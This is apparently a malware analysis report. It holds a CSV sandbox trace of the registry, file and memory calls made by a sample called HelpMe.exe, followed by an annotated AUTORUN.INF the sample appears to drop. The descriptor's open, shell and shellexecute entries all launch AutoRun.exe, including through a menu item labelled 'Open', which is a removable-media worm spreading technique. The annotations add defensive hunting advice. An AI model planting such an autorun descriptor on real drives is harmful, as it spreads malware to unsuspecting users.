"20190910080051.569","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f6","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f6","lpSubKey->CurVer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f2","hKey->0x000000f6","lpSubKey->(null)"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f4","lpValueName->DontShowSuperHidden"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->(null)"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShellState"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ForceActiveDesktopOn"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoActiveDesktop"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\System"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.569","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoWebView"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->ClassicShell"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f8","lpValueName->NoSimpleStartMenu"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000f8","hKey->0x000000f4","lpSubKey->Advanced"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Hidden"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowCompColor"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideFileExt"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->DontPrettyPath"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowInfoTip"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->HideIcons"
"20190910080051.579","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->MapNetDrvBtn"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->WebView"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->Filter"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->ShowSuperHidden"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->SeparateProcess"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f8","lpValueName->NoNetCrawling"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->ShellEx\IconHandler"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->DocObject"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->BrowseInPlace"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000f2","lpSubKey->Clsid"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fe","hKey->HKEY_CLASSES_ROOT","lpSubKey->Folder"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000fe","lpSubKey->Clsid"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->IsShortcut"
"20190910080051.599","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000f2","lpValueName->AlwaysShowExt"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000f2","lpValueName->NeverShowExt"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.609","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->UseDesktopIniCache"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x77120000","lpFileName->oleaut32.dll"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3\Debug"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\OLE"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateProcess"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->MinimumFreeMemPercentageToCreateObject"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->Com+Enabled"
"20190910080051.639","1376","HelpMe.exe","372","system","LoadLibraryA","SUCCESS","0x76fd0000","lpFileName->CLBCATQ.DLL"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000104","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000114","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000134","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000144","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000154","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000015c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000164","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Classes\CLSID"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910080051.639","1376","HelpMe.exe","372","filesystem","CreateFileW","SUCCESS","0x0000016c","lpFileName->C:\WINDOWS\Registration\R000000000007.clb","dwDesiredAccess->GENERIC_READ"
"20190910080051.639","1376","HelpMe.exe","372","filesystem","ReadFile","SUCCESS","","hFile->0x0000016c","nNumberOfBytesToRead->22512"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016c","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\COM3"
"20190910080051.639","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000016c","lpValueName->REGDBVersion"
"20190910080051.649","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00b20000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00000000","dwSize->65536","flAllocationType->0x00002000","flProtect->0x00000001"
"20190910080051.669","1376","HelpMe.exe","372","memory","VirtualAllocEx","SUCCESS","0x00b20000","th32ProcessID->1376","szExeFile->HelpMe.exe","lpAddress->0x00b20000","dwSize->4096","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x000000f2","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017a","hKey->0x000000f2","lpSubKey->(null)"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocServerX86"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->(null)"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandler32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->InprocHandlerX86"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->LocalServer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x0000017e","lpValueName->AppID"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->0x0000017a","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->0x0000016e","lpSubKey->InprocServer32"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->ThreadingModel"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000016e","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{00021401-0000-0000-C000-000000000046}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000016e","lpSubKey->TreatAs"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->0x0000017c","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Generation"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000182","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017e","hKey->HKEY_CLASSES_ROOT","lpSubKey->Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017e","lpValueName->DriveMask"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","FAILURE","","hKey->0x00000180","lpValueName->AllowFileCLSIDJunctions"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegCreateKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegSetValueExW","SUCCESS","","hKey->0x00000180","lpValueName->Personal","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents","cbData->100"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x00000180","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegOpenKeyExW","SUCCESS","0x0000017c","hKey->0x00000180","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910080051.669","1376","HelpMe.exe","372","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000017c","lpValueName->Generation"
1376.csv
; Reviewer annotation: the ";" comment lines are not part of the captured file.
; AutoRun descriptor listed in this report (the label after it reads
; AUTORUN.INF); presumably written by the sample - the write itself and the
; target volume are not shown in this part of the report.
; Every entry names the same target, AutoRun.exe, given as a bare file name,
; i.e. a path relative to the root of the volume that carries this file.
; Defender notes: AutoRun processing can be disabled per drive type with the
; NoDriveTypeAutoRun policy value; an AUTORUN.INF at a volume root whose
; open/shell/shellexecute entries all name one executable is worth hunting for.
[autorun]
; Program AutoRun is asked to start for this volume.
open=AutoRun.exe
; Shortcut-menu verb "1": menu text "Open", command is the same executable,
; so a menu entry that reads like the normal Open action runs AutoRun.exe.
shell\1=Open
shell\1\Command=AutoRun.exe
; Shortcut-menu verb "2": menu text "Browser", same command.
; NOTE(review): the trailing backslash before "=" is as captured - confirm
; against the raw artifact rather than normalising it.
shell\2\=Browser
shell\2\Command=AutoRun.exe
; Same target again via the shellexecute entry.
shellexecute=AutoRun.exe
AUTORUN.INF